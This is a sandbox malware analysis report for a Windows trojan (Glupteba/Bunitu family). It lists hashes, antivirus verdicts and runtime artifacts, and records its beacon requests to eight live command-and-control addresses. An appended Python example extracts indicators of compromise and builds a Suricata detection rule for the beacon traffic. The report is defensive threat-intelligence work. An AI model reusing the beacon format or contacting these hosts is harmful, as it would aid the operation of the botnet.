Analysis Date: 2015-08-05 14:32:40
MD5: 265731579422ab7004915d7559647ca7
SHA1: fcca2c1cb7bade619c7f1dd95872223abdf31be9

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
PEhash: 5670c3168dcaa69693f08a2db817f956af668fbb
IMPhash: 943b709cb2ec662ae54a42eda7be5403

AV results (vendor | verdict as reported by the scanner)
CA (E-Trust Ino) | no_virus
F-Secure | Gen:Variant.Zusy.152774
Dr. Web | BackDoor.Siggen.59488
ClamAV | no_virus
Arcabit (arcavir) | Gen:Variant.Zusy.152774
BullGuard | Gen:Variant.Zusy.152774
Padvish | no_virus
VirusBlokAda (vba32) | no_virus
CAT (quickheal) | no_virus
Trend Micro | no_virus
Kaspersky | no_virus
Zillya! | no_virus
Emsisoft | Gen:Variant.Zusy.152774
Ikarus | Trojan.Win32.Injector
Frisk (f-prot) | no_virus
Authentium | W32/Trojan.NAMU-3646
MalwareBytes | Trojan.Bunitu
MicroWorld (escan) | Error Scanning File
Microsoft Security Essentials | Trojan:Win32/Carberp!rfn
K7 | Trojan ( 004c97431 )
BitDefender | Gen:Variant.Zusy.152774
Fortinet | W32/Glupteba.MRX!tr
Symantec | no_virus
Grisoft (avg) | Inject2.COIK
Eset (nod32) | Win32/Injector.CGDL
Alwil (avast) | Malware-gen:Win32:Malware-gen
Ad-Aware | Gen:Variant.Zusy.152774
Twister | Trojan.DOMG.vxor
Avira (antivir) | TR/AD.Glupteba.Y.286
Mcafee | no_virus
Rising | no_virus

Runtime Details:

Process
↳ C:\malware.exe
    Creates Process: C:\malware.exe

Process
↳ C:\malware.exe
    Registry: HKEY_CURRENT_USER\SOFTWARE\NVIDIA Corporation\Global\nvUpdSrv\value ➝ 21150720\x00
    Creates File: \Device\Afd\Endpoint
    Creates Mutex: Global\MD7H82HHF7EH2D73

Network Details:

HTTP GET http://85.195.119.178:19069/stat?uid=100&downlink=1111&uplink=1111&id=00062230&statpass=bpass&version=21150720&features=30&guid=31993ced-2876-4628-8c9d-f8488431f3c2&comment=21150720&p=0&s=
    User-Agent: (none recorded)
HTTP GET http://5.79.80.162:14066/stat?uid=100&downlink=1111&uplink=1111&id=000636B2&statpass=bpass&version=21150720&features=30&guid=31993ced-2876-4628-8c9d-f8488431f3c2&comment=21150720&p=0&s=
    User-Agent: (none recorded)
HTTP GET http://212.175.87.184:49205/stat?uid=100&downlink=1111&uplink=1111&id=00064A79&statpass=bpass&version=21150720&features=30&guid=31993ced-2876-4628-8c9d-f8488431f3c2&comment=21150720&p=0&s=
    User-Agent: (none recorded)
HTTP GET http://209.17.119.203:34373/stat?uid=100&downlink=1111&uplink=1111&id=00065E10&statpass=bpass&version=21150720&features=30&guid=31993ced-2876-4628-8c9d-f8488431f3c2&comment=21150720&p=0&s=
    User-Agent: (none recorded)
HTTP GET http://178.33.248.60:46612/stat?uid=100&downlink=1111&uplink=1111&id=000671A8&statpass=bpass&version=21150720&features=30&guid=31993ced-2876-4628-8c9d-f8488431f3c2&comment=21150720&p=0&s=
    User-Agent: (none recorded)
HTTP GET http://62.212.154.220:53818/stat?uid=100&downlink=1111&uplink=1111&id=00068540&statpass=bpass&version=21150720&features=30&guid=31993ced-2876-4628-8c9d-f8488431f3c2&comment=21150720&p=0&s=
    User-Agent: (none recorded)
HTTP GET http://115.112.200.88:21160/stat?uid=100&downlink=1111&uplink=1111&id=000698D7&statpass=bpass&version=21150720&features=30&guid=31993ced-2876-4628-8c9d-f8488431f3c2&comment=21150720&p=0&s=
    User-Agent: (none recorded)
HTTP GET http://54.238.54.133:31189/stat?uid=100&downlink=1111&uplink=1111&id=0006AC7F&statpass=bpass&version=21150720&features=30&guid=31993ced-2876-4628-8c9d-f8488431f3c2&comment=21150720&p=0&s=
    User-Agent: (none recorded)

Flows TCP: 192.168.1.1:1031 ➝ 85.195.119.178:19069
Flows TCP: 192.168.1.1:1031 ➝ 85.195.119.178:19069
Flows TCP: 192.168.1.1:1032 ➝ 5.79.80.162:14066
Flows TCP: 192.168.1.1:1033 ➝ 212.175.87.184:49205
Flows TCP: 192.168.1.1:1034 ➝ 209.17.119.203:34373
Flows TCP: 192.168.1.1:1035 ➝ 178.33.248.60:46612
Flows TCP: 192.168.1.1:1036 ➝ 62.212.154.220:53818
Flows TCP: 192.168.1.1:1037 ➝ 115.112.200.88:21160
Flows TCP: 192.168.1.1:1038 ➝ 54.238.54.133:31189
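The eight GET requests above share one fixed query layout: guid, version, comment, uid, downlink, uplink, features, statpass and p are identical in every request, version and comment both equal the value the sample wrote to the nvUpdSrv registry key, and only the host, port and id change from one C2 to the next. The Python below is an added example, not part of the sandbox report or of the sample: it parses the recorded URLs, checks that relationship, lists the C2 endpoints, and turns the constant part of the URI into a Suricata-style rule string. The URL list and registry value are copied from the report; the regex, the function names and the rule text are the example's own assumptions about what is worth matching.

```python
"""Pull indicators out of the recorded /stat beacons and cross-check them
against the registry artifact. Added example; not part of the sandbox report."""
import re
from urllib.parse import parse_qs, urlsplit

# The eight HTTP GET URLs, copied verbatim from the report's Network Details.
REPORT_GETS = [
    "http://85.195.119.178:19069/stat?uid=100&downlink=1111&uplink=1111&id=00062230&statpass=bpass&version=21150720&features=30&guid=31993ced-2876-4628-8c9d-f8488431f3c2&comment=21150720&p=0&s=",
    "http://5.79.80.162:14066/stat?uid=100&downlink=1111&uplink=1111&id=000636B2&statpass=bpass&version=21150720&features=30&guid=31993ced-2876-4628-8c9d-f8488431f3c2&comment=21150720&p=0&s=",
    "http://212.175.87.184:49205/stat?uid=100&downlink=1111&uplink=1111&id=00064A79&statpass=bpass&version=21150720&features=30&guid=31993ced-2876-4628-8c9d-f8488431f3c2&comment=21150720&p=0&s=",
    "http://209.17.119.203:34373/stat?uid=100&downlink=1111&uplink=1111&id=00065E10&statpass=bpass&version=21150720&features=30&guid=31993ced-2876-4628-8c9d-f8488431f3c2&comment=21150720&p=0&s=",
    "http://178.33.248.60:46612/stat?uid=100&downlink=1111&uplink=1111&id=000671A8&statpass=bpass&version=21150720&features=30&guid=31993ced-2876-4628-8c9d-f8488431f3c2&comment=21150720&p=0&s=",
    "http://62.212.154.220:53818/stat?uid=100&downlink=1111&uplink=1111&id=00068540&statpass=bpass&version=21150720&features=30&guid=31993ced-2876-4628-8c9d-f8488431f3c2&comment=21150720&p=0&s=",
    "http://115.112.200.88:21160/stat?uid=100&downlink=1111&uplink=1111&id=000698D7&statpass=bpass&version=21150720&features=30&guid=31993ced-2876-4628-8c9d-f8488431f3c2&comment=21150720&p=0&s=",
    "http://54.238.54.133:31189/stat?uid=100&downlink=1111&uplink=1111&id=0006AC7F&statpass=bpass&version=21150720&features=30&guid=31993ced-2876-4628-8c9d-f8488431f3c2&comment=21150720&p=0&s=",
]

# Data the sample wrote to HKCU\SOFTWARE\NVIDIA Corporation\Global\nvUpdSrv\value
REGISTRY_VERSION = "21150720"

# Shape of the beacon path+query. Host and port differ per C2, so they are
# deliberately left out. This regex is the example's own generalisation of
# the eight observed URLs, not something the report states.
BEACON_RE = re.compile(
    r"^/stat\?uid=\d+&downlink=\d+&uplink=\d+&id=[0-9A-F]{8}&statpass=\w+"
    r"&version=\d{8}&features=\d+&guid=[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}"
    r"&comment=\d{8}&p=\d+&s=$"
)


def parse_beacon(url):
    """Return {host, port, <query params>} for a URL matching the beacon
    shape, or None for anything else (so it can run over a mixed proxy log)."""
    u = urlsplit(url)
    if not BEACON_RE.match(f"{u.path}?{u.query}"):
        return None
    params = {k: v[0] for k, v in parse_qs(u.query, keep_blank_values=True).items()}
    return {"host": u.hostname, "port": u.port, **params}


def extract_iocs(urls, registry_version):
    """Summarise the beacons: distinct C2 endpoints, the guid constant, the
    per-request id values, and whether version/comment agree with the
    registry value (the link between the host artifact and the traffic)."""
    beacons = [b for b in map(parse_beacon, urls) if b is not None]

    def values_of(key):
        return {b[key] for b in beacons}

    return {
        "c2": sorted({(b["host"], b["port"]) for b in beacons}),
        "guid": values_of("guid"),
        "ids": [b["id"] for b in beacons],
        "version_matches_registry": (
            values_of("version") == {registry_version}
            and values_of("comment") == {registry_version}
        ),
    }


def suricata_rule(sid):
    """Rule text for the fixed leading part of the URI (Suricata 5+ sticky
    buffer syntax). sid is the caller's choice from their local range."""
    return (
        'alert http any any -> any any ('
        'msg:"Sandbox sample /stat beacon (statpass=bpass)"; '
        'flow:established,to_server; '
        'http.uri; content:"/stat?uid="; startswith; '
        'content:"&statpass=bpass&version="; '
        f'sid:{sid}; rev:1;)'
    )


if __name__ == "__main__":
    summary = extract_iocs(REPORT_GETS, REGISTRY_VERSION)
    for host, port in summary["c2"]:
        print(f"C2 {host}:{port}")
    print("guid:", summary["guid"])
    print("version/comment == registry value:", summary["version_matches_registry"])
    print(suricata_rule(9000001))
```

The rule keys on the path prefix and the statpass/version pair rather than on any single C2 address, since the report shows eight distinct host:port pairs for the same query layout; the addresses themselves go into a blocklist or a separate IP-based rule.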
